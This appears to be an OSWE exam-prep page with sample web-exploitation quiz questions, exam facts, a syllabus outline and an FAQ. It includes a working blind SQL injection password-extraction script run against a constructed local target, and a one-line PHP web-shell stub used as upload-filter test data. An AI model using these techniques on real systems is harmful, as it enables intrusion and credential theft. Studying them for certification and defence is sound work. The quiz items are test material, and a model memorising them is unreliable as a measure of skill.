
200+ Free OSWE Practice Questions

Pass your OSWE OffSec Web Expert (WEB-300) exam on the first try — instant access, no signup required.


2026 Statistics

Key Facts: OSWE Exam

  • Scored Objectives: 4 (source: OffSec exam guide)
  • Passing Score: 85/100 (source: OffSec exam guide)
  • Exam Time: 47h 45m (source: OffSec exam guide)
  • Report Upload Window: 24 hours (source: OffSec FAQ / proctoring article)
  • Syllabus Modules: 17 (source: OffSec WEB-300 page)
  • Challenge Labs: 20 (source: OffSec WEB-300 page)

As of March 11, 2026, OffSec's OSWE exam remains a 47-hour-45-minute practical with 4 objectives worth 25 points each and an 85/100 passing score. Candidates then have 24 hours to upload their report. OffSec currently allows notes and online resources during the open-book exam, but the FAQ explicitly excludes AI chatbots and LLMs with direct prompt access.

Sample OSWE Practice Questions

Try these sample questions to test your OSWE exam readiness. Each question includes a detailed explanation. Start the interactive quiz above for the full 200+ question experience with AI tutoring.

1. When reproducing a suspected blind SQL injection in a login workflow, which Burp Suite tool is usually best for sending one request at a time while changing a single parameter and watching the response?
A. Intruder
B. Repeater
C. Sequencer
D. Comparer
Explanation: Burp Repeater is built for manual request-by-request testing. In OSWE-style work, you often need to tweak one payload, resend it, and compare tiny response changes without the automation overhead of Intruder.
2. A request only becomes exploitable after the application sets a CSRF token in a hidden form field. What should you capture first in Burp before sending crafted payloads to Repeater?
A. The target's TLS certificate
B. A fresh valid request flow that includes the current token
C. Only the final POST body
D. A screenshot of the rendered page
Explanation: Many OSWE attack chains fail because candidates replay stale state. Capturing a fresh baseline request with the current token, cookies, and headers lets you isolate whether the exploit failed because of business logic or because the session state was invalid.
3. You obtain a deployed ASP.NET application and need to inspect server-side logic quickly. Which approach is most aligned with WEB-300 methodology?
A. Read only the HTML source in the browser
B. Recover the managed assemblies and decompile them
C. Assume the routes match the UI labels
D. Use only directory brute forcing and skip code review
Explanation: WEB-300 explicitly emphasizes source recovery and managed .NET code analysis. Decompiling the assemblies gives you controller logic, validation rules, and hidden code paths that are invisible from the browser alone.
4. A Java web application ships as a WAR file with many `.class` files but no source. What is the most useful next step for white-box review?
A. Convert the classes to images and inspect metadata
B. Decompile the Java classes and trace the request mappings
C. Delete the WEB-INF directory to force verbose errors
D. Focus only on robots.txt and sitemap.xml
Explanation: Decompilation is the practical way to recover Java application logic when source is missing. Once you recover the code, tracing servlet mappings and controller methods often reveals hidden parameters, auth checks, and sinks for injection or RCE.
5. Why is remote debugging valuable when a suspected code path is complex and controlled by multiple conditions?
A. It guarantees a public exploit exists
B. It lets you observe real variable values and execution flow instead of guessing
C. It automatically patches the vulnerability
D. It replaces the need for HTTP testing
Explanation: Remote debugging turns assumptions into evidence. In OSWE-style challenges, seeing which branch executes, what object values are created, and where sanitization actually fails is often the difference between a near miss and a working exploit.
6. A password reset flow reveals whether a user exists by returning different HTML lengths for valid and invalid accounts. What is the main attacker advantage?
A. It enables direct shell access
B. It creates an oracle that can guide account enumeration and follow-on attacks
C. It disables CSRF protection
D. It forces the server to expose source code
Explanation: A response-difference oracle is extremely useful in advanced web exploitation. Even if the server never prints sensitive data directly, predictable differences can let an attacker confirm usernames, valid tokens, or successful boolean conditions.
7. In boolean-based blind SQL injection, why do testers often compare full response bodies rather than relying only on the HTTP status code?
A. Status codes are never returned for SQL queries
B. The application may always return the same status while the page content changes subtly
C. HTTP status codes are encrypted
D. Burp Repeater cannot show status codes
Explanation: Many blind SQLi targets always answer with `200 OK`, so the useful signal lives in the content, length, or redirect target. OSWE-style testing often depends on spotting tiny but repeatable differences in the rendered response.
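The oracle idea behind questions 6 and 7, worked through as an added example (this is editor-written code, not material from the practice set or from OffSec). It builds a constructed, deliberately injectable SQLite login that always answers 200, establishes a known-false baseline body, diffs every probe against that whole body, and binary-searches each character of the admin password through `substr()`/`unicode()`. The table and column names and the credentials are assumptions made for the example.

```python
import sqlite3

# Constructed target for this example: an in-memory SQLite login whose query is
# built by string concatenation. It always answers 200; only the body changes.
_db = sqlite3.connect(":memory:", check_same_thread=False)
_db.execute("CREATE TABLE users (username TEXT, password TEXT)")
_db.execute("INSERT INTO users VALUES ('admin', 'S3cr3t!'), ('guest', 'guest')")

REQUESTS_SENT = 0


def vulnerable_login(username, password):
    """Deliberately injectable. Returns (status, body); status is always 200."""
    global REQUESTS_SENT
    REQUESTS_SENT += 1
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    try:
        row = _db.execute(query).fetchone()
    except sqlite3.Error:
        row = None
    if row:
        return 200, "<html><body><h1>Welcome back, %s</h1></body></html>" % row[0]
    return 200, "<html><body><h1>Login failed</h1></body></html>"


# Baseline: the body the application returns for a condition known to be false.
# Every later probe is diffed against this whole body, not against the status.
FALSE_BODY = vulnerable_login("admin' AND 1=0-- ", "x")[1]


def ask(condition):
    """Boolean oracle: True when the injected condition made the body differ."""
    status, body = vulnerable_login("admin' AND (%s)-- " % condition, "x")
    assert status == 200            # the status code carries no signal here
    return body != FALSE_BODY


def extract(column, table, where, max_len=64):
    """Recover one cell: find its length, then binary-search every character."""
    length = next(
        n for n in range(max_len + 1)
        if ask("(SELECT length(%s) FROM %s WHERE %s) = %d" % (column, table, where, n))
    )
    value = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126                # printable ASCII; widen for other data
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "(SELECT unicode(substr(%s, %d, 1)) FROM %s WHERE %s) > %d" % (
                column, pos, table, where, mid)
            if ask(probe):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value


if __name__ == "__main__":
    secret = extract("password", "users", "username = 'admin'")
    print(secret, "recovered in", REQUESTS_SENT, "requests")
```

Against a real target the `vulnerable_login` call becomes an HTTP request, and the baseline should be re-captured whenever the page's variable content (timestamps, nonces, CSRF tokens) would otherwise make every body differ; strip that noise before diffing or the oracle reports every condition as true.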
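The "capture a fresh flow first" advice from question 2, as an added example written for this page (not code from the practice set or from OffSec). It runs a constructed CSRF-protected login on a loopback port, captures the session cookie and the hidden token together, then shows three outcomes a tester must be able to tell apart: a correct POST with fresh state, a logic failure (wrong password) with fresh state, and a state failure where the token is replayed after the session rotated. The server behaviour, credentials and token format are assumptions made for the example.

```python
import http.cookiejar
import re
import secrets
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed target (assumption for this example): every GET of the login page
# starts a new session, binds a fresh CSRF token to it, and returns both; a POST
# is only processed when the token matches the one stored for the session cookie.
_sessions = {}
VALID_USER, VALID_PASS = "admin", "hunter2"


class _Target(BaseHTTPRequestHandler):
    def log_message(self, *args):   # silence request logging
        pass

    def do_GET(self):
        sid, token = secrets.token_hex(8), secrets.token_hex(16)
        _sessions[sid] = token
        body = ('<form method="post"><input type="hidden" name="csrf" value="%s">'
                '<input name="user"><input name="pass"></form>' % token)
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Set-Cookie", "sid=%s; Path=/" % sid)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body.encode())

    def do_POST(self):
        raw = self.rfile.read(int(self.headers.get("Content-Length", 0))).decode()
        form = {k: v[0] for k, v in urllib.parse.parse_qs(raw).items()}
        cookies = dict(part.strip().split("=", 1)
                       for part in self.headers.get("Cookie", "").split(";") if "=" in part)
        expected = _sessions.get(cookies.get("sid"))
        if expected is None or form.get("csrf") != expected:
            status, body = 403, "invalid csrf token"
        elif (form.get("user"), form.get("pass")) == (VALID_USER, VALID_PASS):
            status, body = 200, "welcome admin"
        else:
            status, body = 401, "bad credentials"
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body.encode())


def start_target():
    server = HTTPServer(("127.0.0.1", 0), _Target)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d/login" % server.server_address[1]


def fresh_state(url):
    """Step 1: capture a fresh flow, keeping the cookie and the token together."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    html = opener.open(url).read().decode()
    token = re.search(r'name="csrf" value="([0-9a-f]+)"', html).group(1)
    return opener, token


def post_login(opener, url, token, user, password):
    """Step 2: send the crafted POST with the captured token and session cookie."""
    data = urllib.parse.urlencode({"csrf": token, "user": user, "pass": password}).encode()
    try:
        resp = opener.open(urllib.request.Request(url, data=data, method="POST"))
        return resp.getcode(), resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def demonstrate():
    """Returns the three outcomes a tester needs to distinguish."""
    server, url = start_target()
    try:
        opener, token = fresh_state(url)
        bad_creds = post_login(opener, url, token, VALID_USER, "wrong")   # logic failure
        fresh = post_login(opener, url, token, VALID_USER, VALID_PASS)    # works
        opener.open(url).read()   # reloading rotates the session and its token
        stale = post_login(opener, url, token, VALID_USER, VALID_PASS)    # state failure
        return {"bad_creds": bad_creds, "fresh": fresh, "stale": stale}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demonstrate())
```

The two failures look nothing alike once you keep the baseline: 401 with a fresh token means the payload or logic is wrong, 403 means your captured state is no longer what the server expects. In Burp the same discipline means re-issuing the GET in Repeater and copying the new token and cookie before every crafted POST.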
8. A file upload filter blocks `.php` files but accepts image uploads. Which server-side mistake most commonly makes a bypass possible?
A. Using TLS 1.2
B. Validating only client-supplied metadata such as filename or MIME type
C. Hashing the file after upload
D. Storing files outside the web root
Explanation: Client-supplied filename and MIME type fields are easy to spoof. Real security depends on server-side content handling, storage location, execution policy, and strict extension validation after normalization.
9. An upload handler removes only the first occurrence of `.php` from the submitted filename and then saves whatever remains. Which filename is most likely to be stored with an executable extension?
A. avatar.png
B. shell.php.php
C. shellphp.png
D. shell.txt
Explanation: Stripping the first `.php` from `shell.php.php` leaves `shell.php`, which the handler then saves as-is. Weak normalization logic creates extension bypasses because it transforms the attacker's input instead of validating the final canonical result; whatever survives the transformation must still be checked against an allowlist, or a later multi-extension misparse by the web server can turn a "cleaned" name into executable code.
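Questions 8 and 9 side by side, as an added example written for this page (not the practice set's or OffSec's code). The weak handler trusts the client's Content-Type and strips the first `.php`; the strict one ignores client metadata, canonicalises the name, allowlists the extension, rejects double extensions, checks the file's leading bytes, and picks the stored name itself. The sample uploads, magic-byte table and helper names are constructed for the example.

```python
import posixpath
import secrets

# Constructed sample uploads: (client filename, client Content-Type, first bytes).
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
PHP_STUB = b"<?php system($_GET['c']); ?>"      # inert bytes here; never executed
SAMPLES = [
    ("avatar.png", "image/png", PNG_MAGIC + b"\x00" * 16),
    ("shell.php.php", "image/png", PHP_STUB),            # question 9 case
    ("shell.php.png", "image/png", PHP_STUB),            # double extension, wrong bytes
    ("shell.PhP", "image/png", PHP_STUB),                # case trick
    ("../../var/www/html/x.png", "image/png", PNG_MAGIC),  # traversal in the name
]

# Allowlist of canonical extensions, each tied to the bytes a real file starts with.
ALLOWED = {".png": PNG_MAGIC, ".jpg": b"\xff\xd8\xff", ".gif": b"GIF8"}


def weak_filter(filename, content_type):
    """Flawed handler (questions 8 and 9): trusts the client's Content-Type and
    removes only the first '.php' from the name it then saves unchanged."""
    if not content_type.startswith("image/"):
        return None
    return filename.replace(".php", "", 1)


def strict_filter(filename, _content_type, data):
    """Hardened handler: validate the canonical final name and the content,
    ignore the client's Content-Type entirely, and choose the stored name."""
    name = posixpath.basename(filename.replace("\\", "/"))   # drop any path part
    root, ext = posixpath.splitext(name)
    ext = ext.lower()
    if ext not in ALLOWED:                  # allowlist, so .phtml/.phar never pass
        return None
    if not root or "." in root:             # no double extensions (mod_mime risk)
        return None
    if not data.startswith(ALLOWED[ext]):   # content must match the extension
        return None
    return secrets.token_hex(16) + ext      # server-chosen name, ideally off web root


def compare(samples=SAMPLES):
    """Returns {client filename: (weak result, strict result)} for the samples."""
    return {name: (weak_filter(name, ctype), strict_filter(name, ctype, data))
            for name, ctype, data in samples}


if __name__ == "__main__":
    for name, (weak, strict) in compare().items():
        print("%-28s weak=%-28s strict=%s" % (name, weak, strict))
```

The weak handler stores `shell.php.php` as `shell.php`, passes `shell.PhP` through untouched, and keeps the `../` path components; the strict handler rejects all of them and accepts only a genuine PNG, under a name the attacker never chose.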
10. After obtaining code execution in a restricted web shell, you need a more stable foothold. What information is usually most valuable to gather first?
A. The developer's LinkedIn profile
B. Writable directories and the application's real web root
C. The browser window size
D. The server's favicon hash
Explanation: Stability matters more than novelty. Knowing where you can write and what the application treats as the real web root lets you turn a fragile foothold into a reliable payload path, which is common in OSWE file-upload and RCE chains.

About the OSWE Exam

OSWE is OffSec's advanced web exploitation certification tied to WEB-300: Advanced Web Attacks and Exploitation. The exam is a long-form, open-book, remotely proctored practical that expects candidates to analyze source code, chain complex web vulnerabilities, develop reliable exploits, retrieve proof, and submit a professional report.

Assessment

4 hands-on objectives worth 25 points each, plus required report submission

Time Limit

47h 45m exam + 24h report upload window

Passing Score

85/100

Exam Fee

$1,749 Course + Cert Bundle or $2,749/year Learn One (OffSec)

OSWE Exam Content Outline

Tooling, Source Recovery, and Debugging (~18%)

Burp workflow, Python interaction, source-code recovery, routing analysis, IDE use, and remote debugging. OffSec does not publish official percentages; every weighting in this outline is inferred from the current WEB-300 syllabus.

Authentication Bypass and Logic Flaws (~18%)

Broken reset flows, weak token generation, session abuse, CORS/CSRF chaining, insecure defaults, and application logic mistakes.

Injection and Data Exfiltration (~20%)

Blind SQL injection, SQLi-assisted account takeover, data extraction, file-upload bypass, command injection, and database-to-RCE thinking.

Deserialization, Type Confusion, and SSTI (~16%)

PHP loose comparison, magic hashes, .NET deserialization, object-graph abuse, template injection discovery, and filter evasion.

XXE, SSRF, and Server-Side Chaining (~14%)

XML parser abuse, blind SSRF enumeration, API discovery, microservice pivoting, and internal-service exploitation.

Client-Side and JavaScript Attack Chains (~9%)

Persistent or DOM-based XSS, JavaScript source analysis, WebSocket abuse, prototype pollution, and template-engine RCE paths.

Custom Exploitation and Reporting (~5%)

Choosing stable exploit paths, writing reproducible proof-of-concept code, collecting evidence, and documenting every objective clearly.

How to Pass the OSWE Exam

What You Need to Know

  • Passing score: 85/100
  • Assessment: 4 hands-on objectives worth 25 points each, plus required report submission
  • Time limit: 47h 45m exam + 24h report upload window
  • Exam fee: $1,749 Course + Cert Bundle or $2,749/year Learn One

Keys to Passing

  • Complete 500+ practice questions
  • Score 80%+ consistently before scheduling
  • Focus on highest-weighted sections
  • Use our AI tutor for tough concepts

OSWE Study Tips from Top Performers

1. Treat source-code review as a primary skill, not a backup plan. OSWE expects you to read unfamiliar code fast and map routes, data flow, and trust boundaries.
2. Build repeatable blind-SQLi workflows for boolean checks, response-diffing, timing, and controlled data extraction instead of memorizing one payload shape.
3. Practice finding exploit chains, not isolated bugs. The exam rewards candidates who can turn a logic flaw, parser weakness, or internal service exposure into reliable access.
4. Get comfortable debugging .NET, Java, JavaScript, and templating behavior so you can verify assumptions instead of guessing about object state or render paths.
5. Rehearse SSRF, XXE, and internal API abuse with a systematic enumeration method so blind server-side bugs turn into actionable targets quickly.
6. Write concise proof-of-concept scripts and clean notes while you work. The report window is only 24 hours, and poor documentation can waste points you already earned.
7. Plan your reporting format before exam day. Screenshots, request/response evidence, reproduction steps, and proof-file handling should be routine by then.

Frequently Asked Questions

What is the OSWE exam format?

OffSec's current OSWE exam guide states that WEB-300 candidates have 47 hours and 45 minutes to complete the exam and that the exam contains 4 objectives worth 25 points each. The guide also states that you must score 85 points to pass. After the practical ends, OffSec gives you another 24 hours to upload your report.

How many questions are on the OSWE exam?

OSWE is not a multiple-choice exam. OffSec currently describes it as a hands-on practical with 4 scored objectives rather than a bank of conventional questions. This practice set provides 200 multiple-choice items to help you rehearse the knowledge and reasoning behind the live exam.

Does OffSec publish official OSWE domain percentages?

As of March 11, 2026, I did not find official percentage weightings for OSWE on OffSec's current WEB-300 course page, syllabus, exam guide, or FAQ. The content sections on this page are therefore inferred from the published WEB-300 syllabus topics and the exam objectives OffSec does describe publicly.

Is OSWE open book, and can I use AI during the exam?

The current OSWE FAQ says the exam is open book and that you may use your notes, online resources, and the OffSec Learning Platform. The same FAQ also explicitly excludes AI chatbots and LLMs with direct prompt access, so you should treat interactive AI assistance as off-limits during the active exam.

How much does the OSWE exam cost in 2026?

The current public WEB-300 page shows pricing starting at $1,749 for the Course + Cert Bundle, while OffSec's current products page lists Learn One at $2,749 per year. OffSec's OSWE pages do not currently show a separate public OSWE standalone-exam listing similar to OSCP+, so the most visible public purchase paths are the training bundle and Learn One subscription.

What changed for OSWE in 2026?

As of March 11, 2026, I did not find a new OSWE-specific overhaul notice comparable to OffSec's separate OSCP+ change announcements. The current official OSWE materials still describe WEB-300/OSWE as a practical in the roughly 48-hour class (47h 45m), and the most relevant current policy language is the FAQ's explicit ban on AI chatbots and direct-prompt LLM use during the open-book exam.